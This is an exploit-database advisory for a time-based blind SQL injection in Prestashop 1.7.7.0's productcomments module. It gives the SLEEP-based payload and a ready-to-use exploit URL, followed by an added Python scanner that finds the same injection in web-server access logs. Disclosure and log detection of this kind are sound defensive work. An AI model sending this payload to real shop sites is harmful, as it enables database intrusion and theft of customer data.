0day Today Exploits Market and 0day Exploits Database

Prestashop 1.7.7.0 - (id_product) Time Based Blind SQL Injection Vulnerability

Author: Jaimin Gondaliya
Risk: Security Risk High
0day-ID: 0day-ID-35663
Category: web applications
Date added: 11-01-2021
Platform: php

# Exploit Title: Prestashop 1.7.7.0 - 'id_product' Time Based Blind SQL Injection
# Exploit Author: Jaimin Gondaliya
# Vendor Homepage: https://www.prestashop.com
# Software Link: https://www.prestashop.com/en/download
# Version: Prestashop CMS - 1.7.7.0
# Tested on: Windows 10

Parameter: id_product

Payload: 1 AND (SELECT 3875 FROM (SELECT(SLEEP(5)))xoOt)

Exploit:
http://localhost/shop//index.php?fc=module&module=productcomments&controller=CommentGrade&id_products[]=1%20AND%20(SELECT%203875%20FROM%20(SELECT(SLEEP(5)))xoOt)
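
For detection, the request above leaves a recognisable trace in web-server access logs. The following scanner is an added example, not part of the original advisory or of PrestaShop's code: it flags requests to the productcomments CommentGrade controller whose id_products[] (or id_product) value is not a plain integer. The log lines, the combined log format and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format), not real traffic.
BASE = "/index.php?fc=module&module=productcomments&controller=CommentGrade"
SAMPLE_LOG = [
    '203.0.113.7 - - [11/Jan/2021:10:00:01 +0000] "GET ' + BASE
    + '&id_products[]=12 HTTP/1.1" 200 57',
    '203.0.113.9 - - [11/Jan/2021:10:00:05 +0000] "GET ' + BASE
    + '&id_products[]=1%20AND%20(SELECT%203875%20FROM%20(SELECT(SLEEP(5)))xoOt)'
    + ' HTTP/1.1" 200 57',
    '203.0.113.7 - - [11/Jan/2021:10:00:09 +0000] '
    '"GET /index.php?id_product=4&controller=product HTTP/1.1" 200 8122',
    '203.0.113.9 - - [11/Jan/2021:10:00:12 +0000] "GET ' + BASE
    + '&id_products%5B%5D=3&id_products%5B%5D=x HTTP/1.1" 200 57',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# The advisory names id_product; its URL uses id_products[]. Check both.
ID_PARAMS = ("id_products[]", "id_product")


def suspicious_values(url):
    """Return (param, value) pairs that are not plain integers, for requests
    addressed to the productcomments CommentGrade controller only."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    if query.get("module") != ["productcomments"]:
        return []
    if query.get("controller") != ["CommentGrade"]:
        return []
    return [(name, value)
            for name in ID_PARAMS
            for value in query.get(name, [])  # parse_qs already URL-decodes
            if not re.fullmatch(r"\d{1,10}", value)]


def scan(lines):
    """Return (client_ip, param, decoded_value) for each non-integer id."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if match is None:
            continue  # not a parsable request line
        for name, value in suspicious_values(match.group(1)):
            hits.append((line.split()[0], name, value))
    return hits


if __name__ == "__main__":
    for ip, name, value in scan(SAMPLE_LOG):
        print(f"{ip} sent non-integer {name}: {value!r}")
```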

#  0day.today [2024-12-25]  #